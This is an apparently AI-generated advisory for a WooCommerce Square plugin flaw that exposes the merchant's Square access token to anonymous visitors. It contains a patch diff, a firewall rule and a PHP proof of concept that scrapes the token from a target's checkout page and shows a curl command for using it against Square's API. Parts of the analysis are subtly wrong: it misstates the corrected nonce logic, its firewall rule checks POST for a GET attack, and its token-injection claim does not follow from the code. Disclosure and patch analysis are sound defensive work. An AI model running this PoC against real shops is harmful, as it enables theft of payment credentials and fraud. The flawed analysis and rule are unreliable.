Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 27, 2026

CVE-2026-54848: WC Shop Sync – Square Payment Gateway and Product Synchronization for WooCommerce <= 4.7.3 Unauthenticated Information Exposure PoC, Patch Analysis & Rule

CVE ID CVE-2026-54848

Plugin woosquare

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 4.7.3

Patched Version 4.7.4

Disclosed June 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-54848:

This vulnerability exposes sensitive data from the WC Shop Sync plugin for WordPress, specifically the Square API access token. The issue affects all versions up to and including 4.7.3. It has a CVSS score of 5.3, indicating a moderate severity information disclosure flaw.

Root Cause: The vulnerable code in class-woosquarepos-gateway.php retrieved the Square access token via get_option(‘woo_square_access_token’ . get_transient(‘is_sandbox’)) and passed it to the browser in JavaScript frontend variables. Specifically, on lines 330 and 363 of the patched file, the token was included in the ‘access_token’ parameter of a JSON array sent to the client. This allowed any unauthenticated visitor to view the token in the rendered page source. The same token was also accepted from user input in GET and POST parameters in the terminal checkout processing functions, which meant an attacker could supply their own token via $_GET[‘token’] or $_POST[‘token’] to perform unauthorized Square API calls.

Exploitation: An attacker can simply view the HTML source of any page using the Square payments frontend. The access token is embedded in a JavaScript object within the page, typically in a script tag containing ajax_url, nonce, and access_token parameters. For example, an attacker visits a product page or checkout page, inspects the source, finds the access_token variable, and copies the token. Alternatively, an attacker can send a crafted GET request to /wp-admin/admin-ajax.php with action=square-pay-check-status and the ‘token’ GET parameter set to any arbitrary value (or the stolen value), which the plugin then uses directly to make an authenticated Square API call.

Patch Analysis: The patch removes the access_token from all JavaScript frontend variables in class-woosquarepos-gateway.php. It also modifies the terminal checkout processing functions (both GET-based and POST-based) in class-woosquare-payments.php to stop reading the token from user-supplied GET/POST parameters. Instead, the token is now always fetched server-side via get_option(‘woo_square_access_token’ . get_transient(‘is_sandbox’)). The patch also fixes a logical operator bug: the original code used ‘&&’ where it should have used ‘||’ in the nonce check, which meant unauthorized requests could bypass nonce validation. The patch changes ‘&&’ to ‘||’ so both conditions must fail to produce an error, preventing nonce bypass attacks.

Impact: An unauthenticated attacker can extract the Square API access token, which grants full access to the merchant’s Square account. This includes reading transaction history, processing refunds, creating or modifying products, and managing customer data. The attacker can also use the token to make fraudulent charges or modify the Square integration settings. Additionally, the attacker could use the token to send arbitrary requests to Square’s API, potentially leading to financial loss, data breaches, and account compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/woosquare/admin/modules/square-payments/class-woosquare-payments.php
+++ b/woosquare/admin/modules/square-payments/class-woosquare-payments.php
@@ -422,9 +422,7 @@
 	 * Processes the checkout for a terminal payment using Square's API.
 	 *
 	 * This function retrieves the status of a terminal checkout using Square's API
-	 * and returns the result in JSON format. It uses the token provided in the GET
-	 * parameters for authorization and fetches the checkout ID from the WordPress
-	 * options.
+	 * and returns the result in JSON format. Uses the stored merchant token server-side only.
 	 *
 	 * @return void
 	 */
@@ -432,39 +430,36 @@
 		if ( ! isset( $_GET['square_pay_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['square_pay_nonce'] ) ), 'square-pay-nonce' ) ) {
 			wp_die( esc_html( __( 'Cheatin’ huh?', 'woosquare-square' ) ) );
 		}
-		if ( ! isset( $_GET['token'] ) ) {
-			$token   = sanitize_text_field( wp_unslash( $_GET['token'] ) );
-			$headers = array(
-				'Accept'        => 'application/json',
-				'Authorization' => 'Bearer ' . $token,
-				'Content-Type'  => 'application/json',
-				'Cache-Control' => 'no-cache',
-			);
-
-			$checkout_id = get_option( 'terminal_checkout_id' );
-			$url         = 'https://connect.squareup' . get_transient( 'is_sandbox' ) . '.com/v2/terminals/checkouts/' . $checkout_id;
-
-			$result = json_decode(
-				wp_remote_retrieve_body(
-					wp_remote_get(
-						$url,
-						array(
-							'method'      => 'GET',
-							'headers'     => $headers,
-							'httpversion' => '1.0',
-							'sslverify'   => false,
-						)
+		$token   = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );
+		$headers = array(
+			'Accept'        => 'application/json',
+			'Authorization' => 'Bearer ' . $token,
+			'Content-Type'  => 'application/json',
+			'Cache-Control' => 'no-cache',
+		);
+
+		$checkout_id = get_option( 'terminal_checkout_id' );
+		$url         = 'https://connect.squareup' . get_transient( 'is_sandbox' ) . '.com/v2/terminals/checkouts/' . $checkout_id;
+
+		$result = json_decode(
+			wp_remote_retrieve_body(
+				wp_remote_get(
+					$url,
+					array(
+						'method'      => 'GET',
+						'headers'     => $headers,
+						'httpversion' => '1.0',
+						'sslverify'   => false,
 					)
 				)
-			);
-			echo wp_json_encode(
-				array(
-					'result'      => 'Result_Status',
-					'result_info' => $result,
-				)
-			);
-
-		}
+			)
+		);
+		echo wp_json_encode(
+			array(
+				'result'      => 'Result_Status',
+				'result_info' => $result,
+			)
+		);

 		wp_die();
 	}
@@ -480,7 +475,7 @@
 	 */
 	public function my_ajax_get_pos_action_callback() {

-		if ( ! isset( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'POSTerminal' ) ) {
+		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'POSTerminal' ) ) {
 			wp_die( esc_html__( 'Unauthorized Request', 'woosquare' ) );
 		}
 		$token           = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );
@@ -700,36 +695,28 @@
 		if ( ! isset( $_POST['cancel_terminal_checkout_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['cancel_terminal_checkout_nonce'] ) ), 'cancel-terminal-checkout' ) ) {
 			wp_die( esc_html__( 'Unauthorized Request', 'woosquare' ) );
 		}
-		if ( ! isset( $_POST['token'] ) ) {
-			$token           = sanitize_text_field( wp_unslash( $_POST['token'] ) );
-			$idempotency_key = time();
-			$checkout_id     = get_option( 'terminal_checkout_id' );
-			$url             = 'https://connect.squareup.com/v2/terminals/checkouts/' . $checkout_id . '/cancel';
+		$token       = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );
+		$checkout_id = get_option( 'terminal_checkout_id' );
+		$url         = 'https://connect.squareup' . get_transient( 'is_sandbox' ) . '.com/v2/terminals/checkouts/' . $checkout_id . '/cancel';

-			$headers =
+		$headers = array(
+			'Accept'         => 'application/json',
+			'Authorization'  => 'Bearer ' . $token,
+			'Content-Type'   => 'application/json',
+			'Square-Version' => '2021-03-17',
+			'Cache-Control'  => 'no-cache',
+		);
+
+		wp_remote_post(
+			$url,
 			array(
-				'Accept'         => 'application/json',
-				'Authorization'  => 'Bearer ' . $token,
-				'Content-Type'   => 'application/json',
-				'Square-Version' => '2021-03-17',
-				'Cache-Control'  => 'no-cache',
-			);
-
-			$checkout_cancel = json_decode(
-				wp_remote_retrieve_body(
-					wp_remote_post(
-						$url,
-						array(
-							'method'      => 'POST',
-							'headers'     => $headers,
-							'httpversion' => '1.0',
-							'sslverify'   => false,
-							'body'        => $checkout_cancel,
-						)
-					)
-				)
-			);
-		}
+				'method'      => 'POST',
+				'headers'     => $headers,
+				'httpversion' => '1.0',
+				'sslverify'   => false,
+				'body'        => '{}',
+			)
+		);
 		wp_die();
 	}

--- a/woosquare/admin/modules/square-payments/class-woosquarepos-gateway.php
+++ b/woosquare/admin/modules/square-payments/class-woosquarepos-gateway.php
@@ -291,7 +291,6 @@
 		$woocommerce_square_settings = get_option( 'woocommerce_square_settings' );
 		$currency_cod                = get_option( 'woocommerce_currency' );
 		$country_code                = $this->get_country_codes( $currency_cod );
-		$access_token                = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );
 		$location_id                 = get_option( 'woo_square_location_id' . get_transient( 'is_sandbox' ) );
 		// need to add condition square payment enable so disable below script.
 		if ( get_transient( 'is_sandbox' ) ) {
@@ -328,7 +327,6 @@
 				'currency_code'    => $currency_cod,
 				'country_code'     => $country_code,
 				'nonce'            => wp_create_nonce( 'squaretpay_params' ),
-				'access_token'     => $access_token,
 				'location_id'      => $location_id,
 				'sandbox'          => get_transient( 'is_sandbox' ),
 				'square_pay_nonce' => wp_create_nonce( 'square-pay-nonce' ),
@@ -352,7 +350,6 @@
 		$woocommerce_square_settings = get_option( 'woocommerce_square_settings' );
 		$currency_cod                = get_option( 'woocommerce_currency' );
 		$country_code                = $this->get_country_codes( $currency_cod );
-		$access_token                = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );
 		$location_id                 = get_option( 'woo_square_location_id' . get_transient( 'is_sandbox' ) );
 		// need to add condition square payment enable so disable below script.

@@ -363,7 +360,6 @@
 			array(
 				'ajax_url'      => admin_url( 'admin-ajax.php' ),
 				'nonce'         => wp_create_nonce( 'POSTerminal' ),
-				'access_token'  => $access_token,
 				'currency_code' => $currency_cod,
 				'currency_sym'  => get_woocommerce_currency_symbol(),
 				'country_code'  => $country_code,
--- a/woosquare/woocommerce-square-integration.php
+++ b/woosquare/woocommerce-square-integration.php
@@ -4,7 +4,7 @@
  * Requires Plugins: woocommerce
  * Plugin URI: https://wcshopsync.com/
  * Description: WC Shop Sync purpose is to migrate & synchronize data (sales customers-invoices-products inventory) between Square system point of sale & WooCommerce plug-in.
- * Version: 4.7.3
+ * Version: 4.7.4
  * Author: Wpexpertsio
  * Author URI: https://wpexperts.io/
  * License: GPLv2 or later

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-54848
# Block unauthenticated access token exposure via AJAX
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261948,phase:2,deny,status:403,chain,msg:'CVE-2026-54848 - Unauthenticated Square access token disclosure via AJAX',severity:'CRITICAL',tag:'CVE-2026-54848'"
  SecRule ARGS_POST:action "@streq square-pay-check-status" "chain"
    SecRule ARGS_GET:token "@rx ^[\w\-]+$" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54848 - WC Shop Sync – Square Payment Gateway and Product Synchronization for WooCommerce <= 4.7.3 - Unauthenticated Information Exposure

/*
 * This PoC extracts the Square access token from the WooCommerce checkout page.
 * The token is exposed in the JavaScript variables of the plugin.
 */

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

// Step 1: Fetch the checkout or any page that uses Square payments
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/checkout/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract the access_token from the JavaScript object
// Look for the pattern 'access_token':'...'
preg_match("/'access_token':'([^']+)'/", $response, $matches);

if (isset($matches[1])) {
    $access_token = $matches[1];
    echo "[+] Extracted Square Access Token: " . $access_token . "n";
    echo "[+] This token can now be used to make API calls to Square as the merchant.n";
    echo "[+] Example: curl -H 'Authorization: Bearer " . $access_token . "' https://connect.squareup.com/v2/locationsn";
} else {
    // Try alternative JSON format
    preg_match('/"access_token":"([^"]+)"/', $response, $matches);
    if (isset($matches[1])) {
        $access_token = $matches[1];
        echo "[+] Extracted Square Access Token: " . $access_token . "n";
    } else {
        echo "[-] Could not find access token in the response.n";
        echo "[-] The site may be patched or the plugin may not be active.n";
    }
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations